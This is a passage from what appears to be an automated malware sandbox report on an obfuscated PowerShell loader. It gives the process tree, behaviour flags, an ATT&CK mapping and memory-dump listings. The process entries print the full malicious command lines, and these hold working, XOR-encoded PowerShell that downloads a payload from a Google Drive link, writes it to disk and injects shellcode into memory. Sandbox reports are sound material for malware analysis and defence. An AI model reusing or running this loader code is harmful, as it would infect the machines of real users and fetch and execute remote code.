sv'anFny6Du8Kl1SoBTo9ImApe0ToBBrDGrADe1LaAAp6StBRe7SeETe3ekEGiBauESp5StFWe2SlEMeFThFHy2LoFIn6Ad9KaCSeBNoDNoAEt4acBga3FaBNgEUfBUn7PeBTr0UnBTeEekFNuCSa9ChBFrBbiCNeATa4KvBFoDCaBEc9PsBMi7ZyFGaAEn8Fr9Re9ElBCuBSwCSkAma6Fa8Tr2tuASe6PlAfo0Ni8HaFToEMe8DeERe8Ha8An8SoBFi7ShAOv0KjBLeDPaFPaEHuFAn2EnEOv5ZiESe7UnEIn7LaECoBEpEFi7HoEVa5VaEIm5OvESy4DiFPaESeFBi2FoELn2IcAElAPoEIn1KnEAg2SpEDy2CeEFr2MiFVeEBrFOr2RyEGr2PsABiAPeECe6SkFLeBSa'Gr;Sk&Ni(Ma`$FlSTvaBkmPyfTyuAtnPr7Te)Ar Hj`$SyTTioGetMitUneHerIliNo8Si;Tr`$HjMAseMutInaAumAtaActEfhPrePimTv0Lu1sc No=An Sc'MuhIntHetJopFrsVa:Be/Sk/MadSarRaiUnvSpeAn.LegpaodaoFogGallaeDr.TicSkoDimOv/UduHocHi?LaeFrxabpEfoHyrGutSv=CidSmokowUtnHolAfoVeaArdUn&PriNudRe=Du1nazJoVSvdOmmDu4SpTCoyDelSiTCrHGa0Di5BytPrqAntMo2AvKSm3MatBaMsihAnxRuuSthGrgChuldELutInNsuYUnmBoVDe'Tr;St`$EdMSteTrtDeaStmAqaCotAdhEleBrmTr0Tr0Va Pr=Kr NoHPhTAaBSn Fr'DiFPh6Po8Av0feBFoBPoBKuCcaBVo5SeBNoEUtBPl7AlBSo3UnBRa6BaFAr2BlETaFVeFFa2FoFbrAAn9VeCBeBre7MeAHy5PrFPrFRu9ArDViBOu0AnBDi8MiBst7NoBSk1GlAAm6BoFpa2Te9PhCPrBAc7BaAPl6foFviCma8Sn5DeBHa7TrBhe0Re9Af1PrBDiEEnBMaBKhBBr7NeBBlCsyATi6TiFPsBPuFReCFo9Ov6FrBPeDSaASa5ElBDrCDiBHyEOrBSaDUnBKu3DrBEr6Ia8By1FlADe6VeAHe0CoBFrBAfBAlCFaBGo5LrFMiAAfFOv6Ko9DeFtoBSt7AlAAf6HoBTa3AcBTrFHyBde3MeAMi6SoBCoAEcBJu7FrBPoFSaEch2BrEKa3AnFfoBVa'Ov;jo`$PrTCyoSgtOptToeDirFoiEr8Be Bi=Th OrHUnTKrBVe Fe'FoFIn6Pa9Im4TaAav0AnBKv3HvASa1SkBRa9UhAXc0RoBDeBAnATr4CaBAl7UdBStEImEWa0MeEPiFskFFo6SeBvi7UtBanCKoAHa4arEMu8FrBKa3ciARe2ExAUn2PaBCy6HuBHa3HyAFu6UnBUp3Ru'Ma;Da&Pu(Me`$ReSSlaDemSkfAnuSvnSt7Sl)St Ps`$OpTRaoVatVetFoePyrOmiPa8At;Co`$AfFTrrWiaSksNekHyrTeiSkvSeeFdlFi2em=By`$FkFUnrSkaFosBekVirPyiFlvPieVilre2Hy+Es'Se\UnBDeeEmrSteMa.CedAdaintPr'Di;Un`$DeRMeiDrnUngUnlbleOpaFydAc=Br'Be'Be;GiirifNo Ad(Tr-BonAfoGhtPr(SuTDreHasSatLa-KmPPraTetLahFr Ep`$SmFGerGraSpsTekrerMaiUnvDueSulJu2Ru)St)Me Al{cawUnhOpiAvlHyeSt Sl(Su`$FrROviKlnLbgEnlFeeDoaPadba Ti-DieLaqFr Da'Fl'Ex)Li Ci{De&Fe(Ge`$AuSExaNemBifOvuJunIn7Tu)Ma Mo`$TrMdyeglthkalamSkaSotArhLoeAnmSp0Ar0To;FjSSttSuaVerRetbl-CaSBrlAteHeeDrpLi Bi5Fe;Id}FoSGreCatBa-neCBroBenBotAfePonSatun De`$BaFPhrGraBesSckSurApiAnvHieSylMu2Ak Ud`$UnRDoiUnnSkgDalFeePraEndTr;Fo}Rr`$OvRDoiGlnRugBelPleUnaTrdSy Pa=Su EtGHyeantFo-ToCVaoUnnButCieLanPrtKo Re`$SaFExrreaFasDdkAnrSliSavDoePolSp2Al;Ud`$KiTSuoSptIltCaeelrSiiSp9Th Ho=Ba kvHHoTPrBUn Wa'FeFSy6Ne8Qi6MiBUnDHaAVi6FuAPu6LaBDu7FiARl0StBScBStFFi2MaETrFBrFSw2Im8Un9Co8Sr1SiAVeBHeAAl1TeAFe6PrBPl7SoBAmFLiFMeCSk9Fu1AtBIlDPoBMyCScASe4ArBMi7SyABe0IdAKe6Un8KaFTrESu8krEWh8Gr9Pr4tiATr0DyBSvDNoBTrFOv9La0BaBCo3IrAWa1MiBEf7DeECu4OrEBe6Bo8Pe1PeAAr6InANd0InBExBAuBPeCEgBTo5SaFFlASnFSt6Fo8Re0skBStBReBCoCStBUd5PrBPoEHvBek7FaBom3RdBPa6SuFAaBko'La;so&Fo(su`$OsSChaChmMofSuuurnDe7Dr)Em Ph`$SsTStoDitBetGeeBlrIniFr9Wh;Fo`$EoRFoiTenPagBalLdePraHedSe0Sl Em=fj OrHSlTSaBAl Ju'Ti8St9Ha8ho1PrAUnBreANe1TrAdy6RoBSv7FiBOsFSuFtrCPi8Ch0UdAAv7LaBunCDiAHa6UnBJoBFoBreFFrBCo7udFToCSl9RaBApBsmCSpAla6ChBEk7UnAOl0AkBMeDStAja2St8Om1TiBEr7AfACh0EpAEx4FlBFiBOdBNo1SyBTu7PeAHa1OrFAdCSc9ScFTaBSo3DeALi0EpASy1EnBTiAUnBWi3MiBJuELa8FaFMaEBl8TeEFl8Ty9Co1AuBFeDInASe2ReADaBTaFViAFuFGr6Di8Ch6StBFlDUlABr6LeAIs6boBAn7BeAno0ClBOpBSaFChEFoFLa2CaESe2PjFFuEVeFRe2IdFMa2InFLa6Ti9Be4thAYp0ApBVi3DrACa1BaBOp9CoASk0TaBTjBKiAKa4SkBUn7DaBKaENeEKm1ToFHoEFoFOp2EmEWi4KoEPa6YoEOp4GaFTjBKi'Er;Sp&Us(Be`$MuSUdaUnmFofUnuInnOp7du)Ma Fu`$HeRRiiRanMogHalroeLaaAldan0Di;ka`$EnTLirRaaVavCeeSalKuoKl=Sa`$CaTBuototNetViePerFeiAv.PecMeoFruSpnRatFa-no6un4Sp6Li;Sy`$WrREpiPanSlgOmlGeeweaVidda1Si Ch=Fr PeHTrTDoBRu Se'Kl8vi9Aa8Sp1AsATrBKoAVi1FoASe6DoBPr7TrBdiFSrFPrCPu8Sp0AfAKu7GiBliCItASp6OuBRaBRoBDeFgrBTe7InFFrCAr9ZeBSkBmeCDiARu6BuBIm7SuADi0PlBStDAsAKo2Va8Co1LaBMi7OuATu0raASa4RaBetBAlBJe1CaBBr7SlAJu1foFCoCSi9AeFFaBCe3KoATe0JeAHa1koBEqASuBFo3OvBalEAs8UrFcoETr8GlEDr8My9Si1FaBOnDRaASk2HoAMoBcaFReAAcFHe6Ge8Se6CoBAmDExAOb6AcABs6PrBhe7PaASy0FrBovBTuFArEtoFSa2FlEMa4SuERe6ZiEVa4AtFVaEUnFMa2ChFOr6Gy8Bi1SeBfa9EnAIr0TiBarDstAtj1DrATo6KlBDa7guEEl3StEspBAnEto5AlFIsEUdFKa2glFSh6Be8Se6GgAVa0KeBVr3SeASt4XyBpr7ilBEgEFrBSuDChFFoBAa'do;sk&El(Br`$SoSDnaUdmEufJouafnKo7Ae)Am Ko`$UdRTriLanTrgUplReeOpaCadth1Pr;tr`$ViRAniOpnMigStlLaeSraFrdAp2St Ti=Du PoHUnTHaBHj Sc'MaFCi6Sl9InDRaBEiFPrBIn5moAma0DiBVb6SuBAn7HeATr0elAOp6AlBHeDKrFCo2PlEumFInFSt2Si8Se9Pr8Re1SaAStBInAFy1DoABo6PaBte7BoBLiFStFcoCSt8Ch0ReADi7MiBfaCThANo6veBAdBGiBMaFLiBCo7UnFJaCGu9ReBReBBaCPrAIn6MiBRe7PrARo0LiBStDShAPr2Be8Pi1StBOr7anAIs0ScATi4SuBUnBInBKa1FoBSt7MaABe1vaFYnCSc9lyFNaBbe3UnAPo0NyAOv1ApBFaAGuBPe3ViBLsEVs8MaFSnEIn8AbEPr8Ad9Sh5DoBCo7PoAAr6lu9Sy6GaBSu7FuBbeEJuBsi7caBDe5CeBHo3ApAKo6NoBSi7Br9Co4PhBDiDSkAmi0Af9Lo4DiACr7stBSlCAnBGi1niACa6miBUdBBeBstDFrBBlCAp8ts2KoBToDStBovBmeBDiCOmADe6stBma7InAFl0ReFbeACuFStAKeBBa4SgBKo9DrADi2NyFAn2PeFre6Lr9Yo3CaBEfCChAUb6DyBfiBAdFUt2HjFGu6Ka9DrFPhBPaBSeAEv6ShBSqALiAMa0TrBDy3beFUnBLiFAcEBeFSp2DaFLaACu9Br5De9De6Ag8Aw6AnFKi2In9Di2LeFDrAEf8Tj9Re9ReBDeBTaCBaASp6Hy8Ra2ReAUn6SpAUd0Ek8ReFFiFThESoFar2pa8Fo9fe9BeBLiBFuCAgAFi6Un8Dr2SaAIn6FuADd0Da8KjFGrFheEViFAn2Ma8Me9hu9SpBAnBBrCOpAPh6Sa8Ja2ViAPe6FaAMe0Po8InFQuFCaESlFFo2sa8Il9Co9RaBKlBToCTeARo6Se8ho2AnASc6PuAMe0mi8LvFAbFCrETrFDe2Re8Co9Ar9LoBJaBAnCAxAUn6af8Da2GiACe6ueAPr0Vi8VaFNoFUbBHlFMi2PlFerARi8Fa9St9EdBAfBLvCHuAFr6Co8Fi2ReANa6OvARe0Ta8HyFBeFMiBNoFHaBUnFKuBCa'Co;Ba&Ur(Se`$EkSDiabemFrfBruAlnFo7me)Au Br`$DaRLeiBenEngTrlCaeViaRedBr2Be;Go`$CeRPeiBunDegGllUneBeaSadGo3pe Su=El EkHPrTMaBDr Aa'HeFRo6Cr9RyDReBFaFAfBSt5LiAch0BuBDi6RaBBo7EfATm0OvAFl6BrBApDTeFDyCAs9InBMnBSeCHoAPs4RhBReDSaBfo9SeBSt7HvFUnABuFTe6Sa9An4chADe0CaBZe3AfASp1HuBTo9SyAUb0FiBCrBToATh4JaBKa7coBAmEUnESu1cyFGrEInFGe6Br8He1miBFl9JuADu0GeBDeDLiAPi1SiAEk6UnBmo7InESv3SoEEmBFoEFi5GhFKuEOpFNo6Br8St1BaASt6EiBBaBKoBToEReBFe9BoEPl5SiEMi3FeFDoEsoEBa2StFKiELuETr2MoFKlBGe'Gr;Sk&Or(Si`$QuSFiaSimunfSpuUdnPl7Bi)Fo ki`$AnRAmiKonStgInlCletraRedha3Ly#Sk;""";Function Ringlead9 { param([String]$Akupun); For($Kaeledyr133=2; $Kaeledyr133 -lt $Akupun.Length-1; $Kaeledyr133+=(2+1)){$Metamathem = $Metamathem + $Akupun.Substring($Kaeledyr133, 1)}; $Metamathem;}$Gulsotsgen0 = Ringlead9 'StIfuEKvXBe ';$Gulsotsgen1= Ringlead9 $tjen;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Gulsotsgen1 ;}else{&$Gulsotsgen0 $Gulsotsgen1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Akupun); $Kroe = ''; Write-Host $Kroe; Write-Host $Kroe; Write-Host $Kroe; $Bakninge = New-Object byte[] ($Akupun.Length / 2); For($Kaeledyr133=0; $Kaeledyr133 -lt $Akupun.Length; $Kaeledyr133+=2){ $Bakninge[$Kaeledyr133/2] = [convert]::ToByte($Akupun.Substring($Kaeledyr133, 2), 16); $Bakninge[$Kaeledyr133/2] = ($Bakninge[$Kaeledyr133/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($Bakninge);}$Prehesita0=HTB '81ABA1A6B7BFFCB6BEBE';$Prehesita1=HTB '9FBBB1A0BDA1BDB4A6FC85BBBCE1E0FC87BCA1B3B4B79CB3A6BBA4B79FB7A6BABDB6A1';$Prehesita2=HTB '95B7A682A0BDB193B6B6A0B7A1A1';$Prehesita3=HTB '81ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4';$Prehesita4=HTB 'A1A6A0BBBCB5';$Prehesita5=HTB '95B7A69FBDB6A7BEB79AB3BCB6BEB7';$Prehesita6=HTB '808681A2B7B1BBB3BE9CB3BFB7FEF29ABBB6B790AB81BBB5FEF282A7B0BEBBB1';$Prehesita7=HTB '80A7BCA6BBBFB7FEF29FB3BCB3B5B7B6';$Prehesita8=HTB '80B7B4BEB7B1A6B7B696B7BEB7B5B3A6B7';$Prehesita9=HTB '9BBC9FB7BFBDA0AB9FBDB6A7BEB7';$Samfun0=HTB '9FAB96B7BEB7B5B3A6B786ABA2B7';$Samfun1=HTB '91BEB3A1A1FEF282A7B0BEBBB1FEF281B7B3BEB7B6FEF293BCA1BB91BEB3A1A1FEF293A7A6BD91BEB3A1A1';$Samfun2=HTB '9BBCA4BDB9B7';$Samfun3=HTB '82A7B0BEBBB1FEF29ABBB6B790AB81BBB5FEF29CB7A581BEBDA6FEF284BBA0A6A7B3BE';$Samfun4=HTB '84BBA0A6A7B3BE93BEBEBDB1';$Samfun5=HTB 'BCA6B6BEBE';$Samfun6=HTB '9CA682A0BDA6B7B1A684BBA0A6A7B3BE9FB7BFBDA0AB';$Samfun7=HTB '9B978A';$Samfun8=HTB '8E';$Anti=HTB '87819780E1E0';$Mithra=HTB '91B3BEBE85BBBCB6BDA582A0BDB193';function fkp {Param ($Apsisfrdig71, $Paill) ;$Totteri0 =HTB 'F681BBA0A2BEB7B1B3BFF2EFF2FA8993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC95B7A693A1A1B7BFB0BEBBB7A1FAFBF2AEF285BAB7A0B7FF9DB0B8B7B1A6F2A9F2F68DFC95BEBDB0B3BE93A1A1B7BFB0BEAB91B3B1BAB7F2FF93BCB6F2F68DFC9EBDB1B3A6BBBDBCFC81A2BEBBA6FAF681B3BFB4A7BCEAFB89FFE38FFC97A3A7B3BEA1FAF682A0B7BAB7A1BBA6B3E2FBF2AFFBFC95B7A686ABA2B7FAF682A0B7BAB7A1BBA6B3E3FB';&($Samfun7) $Totteri0;$Totteri5 = HTB 'F690BDB5BABDBEB6B7A0A1F2EFF2F681BBA0A2BEB7B1B3BFFC95B7A69FB7A6BABDB6FAF682A0B7BAB7A1BBA6B3E0FEF28986ABA2B7898F8FF292FAF682A0B7BAB7A1BBA6B3E1FEF2F682A0B7BAB7A1BBA6B3E6FBFB';&($Samfun7) $Totteri5;$Totteri1 = HTB 'A0B7A6A7A0BCF2F690BDB5BABDBEB6B7A0A1FC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FA8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B48FFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4FAFA9CB7A5FF9DB0B8B7B1A6F29BBCA682A6A0FBFEF2FAF681BBA0A2BEB7B1B3BFFC95B7A69FB7A6BABDB6FAF682A0B7BAB7A1BBA6B3E7FBFBFC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FAF693A2A1BBA1B4A0B6BBB5E5E3FBFBFBFBFEF2F682B3BBBEBEFBFB';&($Samfun7) $Totteri1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Harm65,[Parameter(Position = 1)] [Type] $Ischiocau = [Void]);$Totteri2 = HTB 'F690BEA7A0A6E3E4F2EFF28993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC96B7B4BBBCB796ABBCB3BFBBB193A1A1B7BFB0BEABFAFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC93A1A1B7BFB0BEAB9CB3BFB7FAF682A0B7BAB7A1BBA6B3EAFBFBFEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC97BFBBA6FC93A1A1B7BFB0BEAB90A7BBBEB6B7A093B1B1B7A1A18FE8E880A7BCFBFC96B7B4BBBCB796ABBCB3BFBBB19FBDB6A7BEB7FAF682A0B7BAB7A1BBA6B3EBFEF2F6B4B3BEA1B7FBFC96B7B4BBBCB786ABA2B7FAF681B3BFB4A7BCE2FEF2F681B3BFB4A7BCE3FEF28981ABA1A6B7BFFC9FA7BEA6BBB1B3A1A696B7BEB7B5B3A6B78FFB';&($Samfun7) $Totteri2;$Totteri3 = HTB 'F690BEA7A0A6E3E4FC96B7B4BBBCB791BDBCA1A6A0A7B1A6BDA0FAF682A0B7BAB7A1BBA6B3E4FEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC91B3BEBEBBBCB591BDBCA4B7BCA6BBBDBCA18FE8E881A6B3BCB6B3A0B6FEF2F69AB3A0BFE4E7FBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF682A0B7BAB7A1BBA6B3E5FB';&($Samfun7) $Totteri3;$Totteri4 = HTB 'F690BEA7A0A6E3E4FC96B7B4BBBCB79FB7A6BABDB6FAF681B3BFB4A7BCE0FEF2F681B3BFB4A7BCE1FEF2F69BA1B1BABBBDB1B3A7FEF2F69AB3A0BFE4E7FBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF682A0B7BAB7A1BBA6B3E5FB';&($Samfun7) $Totteri4;$Totteri5 = HTB 'A0B7A6A7A0BCF2F690BEA7A0A6E3E4FC91A0B7B3A6B786ABA2B7FAFB';&($Samfun7) $Totteri5 ;}$Recitersda = HTB 'B9B7A0BCB7BEE1E0';$Totteri6 = HTB 'F69CBDA4B3BEB7B0BEF2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F680B7B1BBA6B7A0A1B6B3F2F681B3BFB4A7BCE6FBFEF2FA959686F292FA899BBCA682A6A08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFBF2FA899BBCA682A6A08FFBFBFB';&($Samfun7) $Totteri6;$Stilk71 = fkp $Samfun5 $Samfun6;$Totteri7 = HTB 'F694A0B3A1B9A0BBA4B7BEE1F2EFF2F69CBDA4B3BEB7B0BEFC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E6E4FEF2E2AAE1E2E2E2FEF2E2AAE6E2FB';&($Samfun7) $Totteri7;$Totteri8 = HTB 'F681B9A0BDA1A6B7E3EBE5F2EFF2F69CBDA4B3BEB7B0BEFC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E5E7E7EBE7E5E5E4FEF2E2AAE1E2E2E2FEF2E2AAE6FB';&($Samfun7) $Totteri8;$Metamathem01 = 'https://drive.google.com/uc?export=download&id=1zVdm4TylTH05tqt2K3tMhxuhguEtNYmV';$Metamathem00 = HTB 'F680BBBCB5BEB7B3B6F2EFF2FA9CB7A5FF9DB0B8B7B1A6F29CB7A6FC85B7B091BEBBB7BCA6FBFC96BDA5BCBEBDB3B681A6A0BBBCB5FAF69FB7A6B3BFB3A6BAB7BFE2E3FB';$Totteri8 = HTB 'F694A0B3A1B9A0BBA4B7BEE0EFF6B7BCA4E8B3A2A2B6B3A6B3';&($Samfun7) $Totteri8;$Fraskrivel2=$Fraskrivel2+'\Bere.dat';$Ringlead='';if (-not(Test-Path $Fraskrivel2)) {while ($Ringlead -eq '') {&($Samfun7) $Metamathem00;Start-Sleep 5;}Set-Content $Fraskrivel2 $Ringlead;}$Ringlead = Get-Content $Fraskrivel2;$Totteri9 = HTB 'F686BDA6A6B7A0BBF2EFF28981ABA1A6B7BFFC91BDBCA4B7A0A68FE8E894A0BDBF90B3A1B7E4E681A6A0BBBCB5FAF680BBBCB5BEB7B3B6FB';&($Samfun7) $Totteri9;$Ringlead0 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF686BDA6A6B7A0BBFEF2E2FEF2F2F694A0B3A1B9A0BBA4B7BEE1FEF2E4E6E4FB';&($Samfun7) $Ringlead0;$Travelo=$Totteri.count-646;$Ringlead1 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF686BDA6A6B7A0BBFEF2E4E6E4FEF2F681B9A0BDA1A6B7E3EBE5FEF2F686A0B3A4B7BEBDFB';&($Samfun7) $Ringlead1;$Ringlead2 = HTB 'F69DBFB5A0B6B7A0A6BDF2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F693BCA6BBF2F69FBBA6BAA0B3FBFEF2FA959686F292FA899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFBF2FA899BBCA682A6A08FFBFBFB';&($Samfun7) $Ringlead2;$Ringlead3 = HTB 'F69DBFB5A0B6B7A0A6BDFC9BBCA4BDB9B7FAF694A0B3A1B9A0BBA4B7BEE1FEF681B9A0BDA1A6B7E3EBE5FEF681A6BBBEB9E5E3FEE2FEE2FB';&($Samfun7) $Ringlead3#"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4424-144-0x0000000006A10000-0x0000000006A2A000-memory.dmp

Filesize
104KB

Download
memory/4424-145-0x00000000077C0000-0x0000000007856000-memory.dmp

Filesize
600KB

Download
memory/4424-141-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/4424-142-0x00000000064E0000-0x00000000064FE000-memory.dmp

Filesize
120KB

Download
memory/4424-140-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/4424-137-0x0000000002BC0000-0x0000000002BF6000-memory.dmp

Filesize
216KB

Download
memory/4424-138-0x0000000005760000-0x0000000005D88000-memory.dmp

Filesize
6.2MB

Download
memory/4424-139-0x0000000005600000-0x0000000005622000-memory.dmp

Filesize
136KB

Download
memory/4424-149-0x00000000084C0000-0x000000000CCD8000-memory.dmp

Filesize
72.1MB

Download
memory/4424-147-0x000000000CCE0000-0x000000000D284000-memory.dmp

Filesize
5.6MB

Download
memory/4424-135-0x0000000000000000-mapping.dmp

Download
memory/4424-143-0x0000000007E40000-0x00000000084BA000-memory.dmp

Filesize
6.5MB

Download
memory/4424-146-0x0000000007700000-0x0000000007722000-memory.dmp

Filesize
136KB

Download
memory/4876-133-0x0000000000000000-mapping.dmp

Download
memory/4876-134-0x00000273FD690000-0x00000273FD6B2000-memory.dmp

Filesize
136KB

Download
memory/4876-148-0x00007FFC18140000-0x00007FFC18C01000-memory.dmp

Filesize
10.8MB

Download
memory/4876-136-0x00007FFC18140000-0x00007FFC18C01000-memory.dmp

Filesize
10.8MB

Download
memory/5096-132-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing